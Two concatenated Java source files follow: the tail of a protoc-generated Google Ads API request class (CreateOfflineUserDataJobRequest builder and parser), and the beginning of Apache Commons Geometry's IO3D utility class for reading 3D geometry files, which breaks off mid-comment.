result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if (other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. */ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v21.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v21.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v21.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v21.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. */ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/commons-geometry
36,372
commons-geometry-io-euclidean/src/main/java/org/apache/commons/geometry/io/euclidean/threed/IO3D.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.commons.geometry.io.euclidean.threed; import java.net.URL; import java.nio.file.Path; import java.util.Collection; import java.util.stream.Stream; import org.apache.commons.geometry.euclidean.threed.BoundarySource3D; import org.apache.commons.geometry.euclidean.threed.PlaneConvexSubset; import org.apache.commons.geometry.euclidean.threed.Triangle3D; import org.apache.commons.geometry.euclidean.threed.mesh.TriangleMesh; import org.apache.commons.geometry.io.core.GeometryFormat; import org.apache.commons.geometry.io.core.input.FileGeometryInput; import org.apache.commons.geometry.io.core.input.GeometryInput; import org.apache.commons.geometry.io.core.input.UrlGeometryInput; import org.apache.commons.geometry.io.core.output.FileGeometryOutput; import org.apache.commons.geometry.io.core.output.GeometryOutput; import org.apache.commons.numbers.core.Precision; /** Utility class providing convenient access to 3D IO functionality. The static read and write methods here * delegate to a default {@link #getDefaultManager() BoundaryIOManager3D} instance. The default * configuration should be sufficient for most purposes. If customization is required, consider directly * creating and configuring and a {@link BoundaryIOManager3D} instance. * * <p><strong>Examples</strong></p> * <p>The example below reads an OBJ file as a stream of triangles, transforms each triangle, and writes the * result as a CSV file. The data formats are inferred from the input and output file extensions.</p> * <pre> * GeometryInput input = new FileGeometryInput(Paths.get("orig.obj")); * GeometryOutput scaledOutput = new FileGeometryOutput(Paths.get("scaled.csv")); * AffineTransformMatrix3D transform = AffineTransformMatrix3D.createScale(2); * * // Use the input triangle stream in a try-with-resources statement to ensure * // all resources are properly released. * try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(input, null, precision)) { * IO3D.write(stream.map(t -&gt; t.transform(transform)), scaledOutput, null); * } * </pre> * @see BoundaryIOManager3D */ public final class IO3D { /** Utility class; no instantiation. */ private IO3D() {} /** Get a {@link FacetDefinitionReader} for reading facet information from the given file path. * The data format is determined by the file extension of the argument. * @param path path to obtain a reader for * @return facet definition reader * @throws IllegalArgumentException if no handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat) */ public static FacetDefinitionReader facetDefinitionReader(final Path path) { return facetDefinitionReader(new FileGeometryInput(path), null); } /** Get a {@link FacetDefinitionReader} for reading facet information from the given URL. * The data format is determined by the file extension of the argument. * @param url URL to read from * @return facet definition reader * @throws IllegalArgumentException if no handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat) */ public static FacetDefinitionReader facetDefinitionReader(final URL url) { return facetDefinitionReader(new UrlGeometryInput(url), null); } /** Get a {@link FacetDefinitionReader} for reading facet information from the given input. * @param in input to read from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the input {@link GeometryInput#getFileName() file name} * @return facet definition reader * @throws IllegalArgumentException if no handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat) */ public static FacetDefinitionReader facetDefinitionReader(final GeometryInput in, final GeometryFormat fmt) { return getDefaultManager().facetDefinitionReader(in, fmt); } /** Return a {@link Stream} providing access to all facets from the given file path. The data format * is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(path)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param path file path to read from * @return stream providing access to the facets in the specified file * @throws IllegalArgumentException if no handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat) */ public static Stream<FacetDefinition> facets(final Path path) { return facets(new FileGeometryInput(path), null); } /** Return a {@link Stream} providing access to all facets from the given URL. he data format * is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(url)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param url URL to read from * @return stream providing access to the facets from the specified URL * @throws IllegalArgumentException if no handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat) */ public static Stream<FacetDefinition> facets(final URL url) { return facets(new UrlGeometryInput(url), null); } /** Return a {@link Stream} providing access to all facets from the given input. The underlying input * stream is closed when the returned stream is closed. Callers should therefore use the returned stream * in a try-with-resources statement to ensure that all resources are properly released. * <pre> * try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(in, fmt)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param in input to read from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the input {@link GeometryInput#getFileName() file name} * @return stream providing access to the facets in the input * @throws IllegalArgumentException if no read handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat) */ public static Stream<FacetDefinition> facets(final GeometryInput in, final GeometryFormat fmt) { return getDefaultManager().facets(in, fmt); } /** Return a {@link Stream} providing access to all boundaries from the given file path. The * data format is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;PlaneConvexSubset&gt; stream = IO3D.boundaries(path, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param path file path to read from * @param precision precision context used for floating point comparisons * @return stream providing access to the boundaries in the specified file * @throws IllegalArgumentException if no read handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<PlaneConvexSubset> boundaries(final Path path, final Precision.DoubleEquivalence precision) { return boundaries(new FileGeometryInput(path), null, precision); } /** Return a {@link Stream} providing access to all boundaries from the given URL. The data * format is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;PlaneConvexSubset&gt; stream = IO3D.boundaries(url, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param url URL to read from * @param precision precision context used for floating point comparisons * @return stream providing access to the boundaries in the specified URL * @throws IllegalArgumentException if no read handler has been registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<PlaneConvexSubset> boundaries(final URL url, final Precision.DoubleEquivalence precision) { return boundaries(new UrlGeometryInput(url), null, precision); } /** Return a {@link Stream} providing access to all boundaries from the given input. The underlying input * stream is closed when the returned stream is closed. Callers should therefore use the returned stream * in a try-with-resources statement to ensure that all resources are properly released. Ex: * <pre> * try (Stream&lt;H&gt; stream = IO3D.boundaries(in, fmt, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param in input to read boundaries from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the input {@link GeometryInput#getFileName() file name} * @param precision precision context used for floating point comparisons * @return stream providing access to the boundaries in the input * @throws IllegalArgumentException if no read handler is registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<PlaneConvexSubset> boundaries(final GeometryInput in, final GeometryFormat fmt, final Precision.DoubleEquivalence precision) { return getDefaultManager().boundaries(in, fmt, precision); } /** Return a {@link Stream} providing access to all triangles from the given file path. The data * format is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(path, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param path file path to read from * @param precision precision context used for floating point comparisons * @return stream providing access to the triangles in the specified file * @throws IllegalArgumentException if no read handler is registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<Triangle3D> triangles(final Path path, final Precision.DoubleEquivalence precision) { return triangles(new FileGeometryInput(path), null, precision); } /** Return a {@link Stream} providing access to all triangles from the given URL. The data format * is determined by the file extension of the argument. * * <p>The underlying input stream is closed when the returned stream is closed. Callers should * therefore use the returned stream in a try-with-resources statement to ensure that all * resources are properly released. Ex: * </p> * <pre> * try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(url, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param url URL to read from * @param precision precision context used for floating point comparisons * @return stream providing access to the triangles from the specified URL * @throws IllegalArgumentException if no read handler is registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<Triangle3D> triangles(final URL url, final Precision.DoubleEquivalence precision) { return triangles(new UrlGeometryInput(url), null, precision); } /** Return a {@link Stream} providing access to all triangles from the given input. The underlying input * stream is closed when the returned stream is closed. Callers should therefore use the returned stream * in a try-with-resources statement to ensure that all resources are properly released. * <pre> * try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(in, fmt, precision)) { * // access stream content * } * </pre> * <p>The following exceptions may be thrown during stream iteration: * <ul> * <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li> * <li>{@link IllegalStateException} if a data format error occurs</li> * <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li> * </ul> * @param in input to read from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the input {@link GeometryInput#getFileName() file name} * @param precision precision context used for floating point comparisons * @return stream providing access to the triangles in the input * @throws IllegalArgumentException if no read handler is registered with the * {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs during stream creation * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static Stream<Triangle3D> triangles(final GeometryInput in, final GeometryFormat fmt, final Precision.DoubleEquivalence precision) { return getDefaultManager().triangles(in, fmt, precision); } /** Return a {@link BoundarySource3D} containing all boundaries from the file at the * given path. The data format is determined from the file extension. A runtime exception may be * thrown if mathematically invalid boundaries are encountered. * @param path file path to read from * @param precision precision context used for floating point comparisons * @return object containing all boundaries from the file at the given path * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static BoundarySource3D read(final Path path, final Precision.DoubleEquivalence precision) { return read(new FileGeometryInput(path), null, precision); } /** Return a {@link BoundarySource3D} containing all boundaries from the given URL. The data * format is determined from the file extension of the URL path. A runtime exception may be * thrown if mathematically invalid boundaries are encountered. * @param url URL to read from * @param precision precision context used for floating point comparisons * @return object containing all boundaries from the given URL * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static BoundarySource3D read(final URL url, final Precision.DoubleEquivalence precision) { return read(new UrlGeometryInput(url), null, precision); } /** Return a {@link BoundarySource3D} containing all boundaries from the given input. A runtime * exception may be thrown if mathematically invalid boundaries are encountered. * @param in input to read boundaries from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the input {@link GeometryInput#getFileName() file name} * @param precision precision context used for floating point comparisons * @return object containing all boundaries from the input * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static BoundarySource3D read(final GeometryInput in, final GeometryFormat fmt, final Precision.DoubleEquivalence precision) { return getDefaultManager().read(in, fmt, precision); } /** Return a {@link TriangleMesh} containing all triangles from the given file path. The data * format is determined from the file extension of the path. A runtime exception may be * thrown if mathematically invalid boundaries are encountered. * @param path file path to read from * @param precision precision context used for floating point comparisons * @return mesh containing all triangles from the given file path * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static TriangleMesh readTriangleMesh(final Path path, final Precision.DoubleEquivalence precision) { return readTriangleMesh(new FileGeometryInput(path), null, precision); } /** Return a {@link TriangleMesh} containing all triangles from the given URL. The data * format is determined from the file extension of the URL path. A runtime exception may be * thrown if mathematically invalid boundaries are encountered. * @param url URL to read from * @param precision precision context used for floating point comparisons * @return mesh containing all triangles from the given URL * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler * is registered with the {@link #getDefaultManager() default manager} for the input format * @throws IllegalStateException if a data format error occurs * @throws java.io.UncheckedIOException if an I/O error occurs * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence) */ public static TriangleMesh readTriangleMesh(final URL url, final Precision.DoubleEquivalence precision) { return readTriangleMesh(new UrlGeometryInput(url), null, precision); } /** Return a {@link TriangleMesh} containing all triangles from the given input. A runtime exception * may be thrown if mathematically invalid boundaries are encountered. * @param in input to read from * @param fmt format of the input; if {@code null}, the format is determined implicitly from the * file extension of the 